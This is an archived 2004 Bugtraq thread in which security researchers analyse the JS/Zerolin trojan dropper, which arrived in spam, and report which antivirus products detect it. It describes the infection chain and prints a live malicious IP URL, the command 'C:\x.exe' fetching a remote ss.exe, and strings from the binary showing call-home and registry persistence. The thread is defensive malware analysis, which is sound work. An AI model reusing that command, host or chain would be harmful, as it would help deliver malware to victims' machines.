Home page logo
/

bugtraq logo Bugtraq mailing list archives

RE: JS/Zerolin
From: "Thor Larholm" <tlarholm () pivx com>
Date: Fri, 13 Aug 2004 17:04:58 -0700

Nicholas was kind enough to provide me with a sample of Zerolin.

Anyone who is even remotely up-to-date with their patches will not be affected by this. At the end of the email is a 
short piece of encoded Jscript code which when decoded outputs a hidden iframe that retrieves the following URL:

http://202.99.172.153/link.html

Don't click the link, it is still live. 

Following a lot of pagebreaks is an attempt to exploit the Object Data vulnerability that was fixed by MS03-040. If 
successful, this launches MSHTA.EXE which executes the code provided by http://202.99.172.153/link.php which in turn 
outputs an embedded file to C:\x.exe after which it executes the following command:

C:\x.exe http://202.99.172.153/ss.exe

Here's some of the more interesting strings from that file which suggests Zerolin talks back to index.php on that same 
IP to notify its owner of a compromised machine:



CoCreateGuid
StringFromCLSID
ole32.dll
wsprintfA
CreateWindowExA
DefWindowProcA
DispatchMessageA
GetMessageA
KillTimer
LoadCursorA
LoadIconA
PostQuitMessage
RegisterClassExA
SendMessageA
SetTimer
SetWindowsHookExA
TranslateMessage
UnhookWindowsHookEx
USER32.dll
CloseHandle
CopyFileA
CreateMutexA
CreateProcessA
CreateThread
DeleteFileA
ExitProcess
FreeLibrary
GetCommandLineA
GetCurrentProcess
GetFileSize
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetSystemDirectoryA
GetTickCount
GetVersionExA
GlobalAlloc
GlobalFree
LoadLibraryA
OpenMutexA
ReleaseMutex
Sleep
TerminateProcess
WaitForSingleObject
WinExec
_lclose
_lcreat
_lopen
_lread
_lwrite
lstrcatA
lstrcmpA
lstrcpyA
lstrlenA
KERNEL32.dll
InitializeAcl
IsValidAcl
RegCloseKey
RegCreateKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
SetSecurityInfo
ADVAPI32.dll
WS2_32.dll
%lu
Timer UP
Timer Down
&Name=
 http://
/index.php?Client=
close
SSClass
SSIcon
kernel32.dll
RegisterServiceProcess
\dss.dll
\dssa.dll
dssa.dll
\ss.dat
\ss.dop
202.99.
CLSID\
\InProcServer32
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
172.153
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
Default
AutoProc
ss.exe
\ss.exe
one
CallNextHookEx
USER32.dll
GetSystemDirectoryA
WinExec
lstrcatA
KERNEL32.dll
dss.dll
AutoProc
\ss.exe
FindWindowA
SendMessageA
USER32.dll
DeleteFileA
GetFileSize
GetSystemDirectoryA
GlobalAlloc
GlobalFree
WinExec
_lclose
_lcreat
_lopen
_lread
_lwrite
lstrcatA
lstrcpyA
KERNEL32.dll
dssa.dll
AutoProc
\ss.exe
\ss.dat
\ss.dop





Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor () pivx com
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6  20CD 5BDB 3D99 4207 AEE9

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. 
<http://www.pivx.com/qwikfix>


 

-----Original Message-----
From: T.H. Haymore [mailto:bonk () webchat chatsystems com] 
Sent: Friday, August 13, 2004 7:51 AM
To: Nicolas Gregoire
Cc: bugtraq () securityfocus com; Mark.Amos () owenscorning com
Subject: Re: JS/Zerolin

On Fri, 13 Aug 2004, Nicolas Gregoire wrote:


Nicholas,

 Thanks for the insight.  I've received several replies telling me to look at McAfee (yadda-yadda) and other sites.  I 
am well aware of the Zerolin VBS script as I researched it before posting.  You've provided what insight I was looking 
for on the java script side.

Mark, I think this is what we're looking for.  Also, keep us updated as to what else you see as this could very well be 
a new version and they are indeed 'testing'.



Thanks again,


-th

<snip>


Hi,

I've seen theses emails since last Friday, and my gateway has since 
received around 200 of them. KAV and ClamAV detect them as 
"TrojanDropper.VBS.Zerolin"

It appears that a small Jscript.Encoded code is hidden at the botton 
of a false (true ?) spam. After several redirections, un ss.exe file 
is downloaded. This file is detected as following :

KAV : Trojan.Win32.Genme.c
Trend : not detected
ClamAV : Trojan.Xebiz.A
F-Prot : W32/Xebiz.A
NAI : not detected

Regards,
--
Nicolas Gregoire ----- Consultant en Sécurité des Systèmes 
d'Information


=================================================
Travis
www.cyberabuse.org/crimewatch
Email: Bonk () chatsystems com | Bonk () cyberabuse org =================================================
/"\
\ /
 X   ASCII Ribbon Campaign
/ \  Against HTML Email


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault